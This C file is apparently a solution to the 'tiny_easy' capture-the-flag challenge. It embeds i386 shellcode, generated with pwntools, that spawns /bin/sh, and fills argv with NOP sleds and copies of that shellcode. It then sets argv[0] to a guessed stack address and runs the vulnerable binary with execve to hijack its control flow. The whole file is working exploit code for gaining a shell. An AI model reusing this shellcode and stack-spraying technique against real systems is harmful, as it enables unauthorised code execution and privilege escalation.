#include <stdlib.h>
#include <stdio.h>
#include <memory.h>
#include <errno.h>
#include <unistd.h>

// generated by pwntools:
// from pwn import *
// context(arch = 'i386', os = 'linux')
// asm(shellcraft.sh())
static const char shellcode[] = 
    "\x6a\x68\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x68\x01\x01\x01\x01\x81\x34\x24\x72\x69\x01\x01\x31\xc9\x51\x6a\x04\x59\x01\xe1\x51\x89\xe1\x31\xd2\x6a\x0b\x58\xcd\x80";

#define call_addr "\x04\xdf\xf0\xff"
#define argc 511
int main() {
    char argv0[4096];
    char argv_other[4096];
    char* argv[argc + 1];

    memset(argv0, 0x90, sizeof(argv0));
    memset(argv_other, 0x90, sizeof(argv_other));
    memcpy(argv0, call_addr, 4);
    memcpy(argv0 + sizeof(argv0) - sizeof(shellcode) - 1, shellcode, sizeof(shellcode));
    memcpy(argv_other + sizeof(argv_other) - sizeof(shellcode) - 1, shellcode, sizeof(shellcode));
    argv0[sizeof(argv0) - 1] = 0;
    argv_other[sizeof(argv_other) - 1] = 0;
    
    argv[0] = argv0;
    for (int i = 1; i < argc; ++i)
        argv[i] = argv_other;
    argv[argc] = NULL;

    if (-1 == execve("/home/tiny_easy/tiny_easy", argv, NULL)) {
        printf("execve failed! %s\n", strerror(errno));
    }
    return 0;
}
